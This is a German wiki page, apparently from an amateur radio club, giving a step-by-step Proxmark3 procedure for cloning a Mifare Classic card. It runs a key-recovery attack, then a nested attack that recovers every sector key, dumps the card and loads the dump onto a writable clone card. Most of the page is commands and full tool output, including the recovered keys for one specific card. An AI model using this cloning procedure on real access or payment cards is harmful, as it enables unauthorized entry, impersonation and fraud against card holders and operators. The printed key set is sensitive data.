This is an old revision of the document!
Dank Jan haben wir einen wir einen proxmark3, welcher aktuell (Stand: 10.02.2014) auf Version 844 läuft.
Auf dem DL0MUC-Rechner ist (in Kürze) die dazu passende Software installiert
Mifare Cloning
- Einen gültigen Key herausfinden
proxmark3> hf mf mifare ------------------------------------------------------------------------- Executing command. Expected execution time: 25sec on average :-) Press the key on the proxmark3 device to abort both proxmark3 and client. ------------------------------------------------------------------------- ........................ uid(352c1f4c) nt(b30c6cee) par(ba92426af29a2a32) ks(0008090f0e0f070d) nr(00000000) |diff|{nr} |ks3|ks3^5|parity | +----+--------+---+-----+---------------+ | 00 |00000000| 0 | 5 |0,1,0,1,1,1,0,1| | 20 |00000020| 8 | d |0,1,0,0,1,0,0,1| | 40 |00000040| 9 | c |0,1,0,0,0,0,1,0| | 60 |00000060| f | a |0,1,0,1,0,1,1,0| | 80 |00000080| e | b |0,1,0,0,1,1,1,1| | a0 |000000a0| f | a |0,1,0,1,1,0,0,1| | c0 |000000c0| 7 | 2 |0,1,0,1,0,1,0,0| | e0 |000000e0| d | 8 |0,1,0,0,1,1,0,0| key_count:1 ------------------------------------------------------------------ Key found:e251a9da734d Found valid key:e251a9da734d proxmark3>
- Mit dem oben gefundenen Key, die ganzen restlichen Keys herausfinden (dauert ein bisschen)
proxmark3> hf mf nested 1 0 A e251a9da734d d --block no:00 key type:00 key:e2 51 a9 da 73 4d etrans:0 Block shift=0 Testing known keys. Sector count=16 nested... ----------------------------------------------- uid:352c1f4c len=2 trgbl=0 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=8 trgkey=0 Found valid key:06930625f573 ----------------------------------------------- uid:352c1f4c len=2 trgbl=8 trgkey=1 Found valid key:9aeb465f44c9 ----------------------------------------------- uid:352c1f4c len=2 trgbl=12 trgkey=0 Found valid key:3ed2990cc0c3 ----------------------------------------------- uid:352c1f4c len=2 trgbl=12 trgkey=1 Found valid key:f9e3c2b9421a ----------------------------------------------- uid:352c1f4c len=2 trgbl=16 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=16 trgkey=1 Found valid key:f18ea2dcca6f ----------------------------------------------- uid:352c1f4c len=2 trgbl=20 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=20 trgkey=1 Found valid key:6f259862ef91 ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=0 Found valid key:f0bf64a6bf6a ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=28 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=28 trgkey=1 Found valid key:59039bbc5f20 ----------------------------------------------- uid:352c1f4c len=2 trgbl=32 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=32 trgkey=1 Found valid key:59039bbc5f20 ----------------------------------------------- uid:352c1f4c len=2 trgbl=36 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=36 trgkey=1 Found valid key:d412a41ecb09 ----------------------------------------------- uid:352c1f4c len=2 trgbl=40 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=40 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=44 trgkey=0 Found valid key:d271ff53eeda ----------------------------------------------- uid:352c1f4c len=2 trgbl=44 trgkey=1 Found valid key:b6ca78eabb2a ----------------------------------------------- uid:352c1f4c len=2 trgbl=48 trgkey=0 Found valid key:cb87a64088e7 ----------------------------------------------- uid:352c1f4c len=2 trgbl=48 trgkey=1 Found valid key:0653bf2b8701 ----------------------------------------------- uid:352c1f4c len=2 trgbl=52 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=52 trgkey=1 Found valid key:541550280d7e ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=60 trgkey=0 Found valid key:f0bf64a6bf6a ----------------------------------------------- uid:352c1f4c len=2 trgbl=60 trgkey=1 Found valid key:59039bbc5f20 ----------------------------------------------- uid:352c1f4c len=2 trgbl=0 trgkey=1 Found valid key:322c9cbbe53f ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=0 Found valid key:9c8c07c9f190 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=16 trgkey=0 Found valid key:5ed4f3654421 ----------------------------------------------- uid:352c1f4c len=2 trgbl=20 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=28 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=32 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=36 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=40 trgkey=0 Found valid key:9dec238a9214 ----------------------------------------------- uid:352c1f4c len=2 trgbl=40 trgkey=1 Found valid key:bd451e445aed ----------------------------------------------- uid:352c1f4c len=2 trgbl=52 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=0 Found valid key:472a6f5519ad ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=20 trgkey=0 Found valid key:cfea5408a6da ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=28 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=32 trgkey=0 Found valid key:f0bf64a6bf6a ----------------------------------------------- uid:352c1f4c len=2 trgbl=36 trgkey=0 ----------------------------------------------- uid:352c1f4c len=2 trgbl=52 trgkey=0 Found valid key:a6d80a83ded6 ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=28 trgkey=0 Found valid key:f0bf64a6bf6a ----------------------------------------------- uid:352c1f4c len=2 trgbl=36 trgkey=0 Found valid key:8f0e6a510598 ----------------------------------------------- uid:352c1f4c len=2 trgbl=56 trgkey=1 Found valid key:f3be399eba7b ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=24 trgkey=1 Found valid key:59039bbc5f20 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 ----------------------------------------------- uid:352c1f4c len=2 trgbl=4 trgkey=1 Found valid key:5a6041c9f9fc Time in nested: 37,380 (0,603 sec per key) ----------------------------------------------- Iterations count: 62 |---|----------------|---|----------------|---| |sec|key A |res|key B |res| |---|----------------|---|----------------|---| |000| e251a9da734d | 1 | 322c9cbbe53f | 1 | |001| 9c8c07c9f190 | 1 | 5a6041c9f9fc | 1 | |002| 06930625f573 | 1 | 9aeb465f44c9 | 1 | |003| 3ed2990cc0c3 | 1 | f9e3c2b9421a | 1 | |004| 5ed4f3654421 | 1 | f18ea2dcca6f | 1 | |005| cfea5408a6da | 1 | 6f259862ef91 | 1 | |006| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 | |007| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 | |008| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 | |009| 8f0e6a510598 | 1 | d412a41ecb09 | 1 | |010| 9dec238a9214 | 1 | bd451e445aed | 1 | |011| d271ff53eeda | 1 | b6ca78eabb2a | 1 | |012| cb87a64088e7 | 1 | 0653bf2b8701 | 1 | |013| a6d80a83ded6 | 1 | 541550280d7e | 1 | |014| 472a6f5519ad | 1 | f3be399eba7b | 1 | |015| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 | |---|----------------|---|----------------|---| Printing keys to bynary file dumpkeys.bin... proxmark3>
- Den Inhalt der Karte unter Zuhilfenahme der gefunden Keys dumpen
proxmark3> hf mf dump |-----------------------------------------| |------ Reading sector access bits...-----| |-----------------------------------------| #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED #db# READ BLOCK FINISHED |-----------------------------------------| |----- Dumping all blocks to file... -----| |-----------------------------------------| #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' #db# READ BLOCK FINISHED Dumped card data into 'dumpdata.bin' proxmark3>
- Den entstandenen Dump ins eml-Format konvertieren (PM3-Scripts sind am Ende der Seite in den Downloads)
user@host:~$ ./pm3_bin2eml.py dumpdata.bin dumpdata.eml
- Das eml-File in eine “Magic Chinese Guy”-Karte laden (diese vorher natürlich auf den proxmark legen!)
proxmark3> hf mf cload dumpdata Loaded from file: dumpdata.eml proxmark3>
- Fertig
Downloads
- prox.rar (Quelle: http://www.fuzzysecurity.com/)
- Proxmark-Firmware/Client, etc.: https://code.google.com/p/proxmark3/wiki/Linux
Debugging
Make-Fehler unter (u.a.) Ubuntu
Im client/Makefile dashier ändern:
CXXFLAGS = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) -Wall -O4 QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null) MOC = /usr/lib/x86_64-linux-gnu/qt4/bin/moc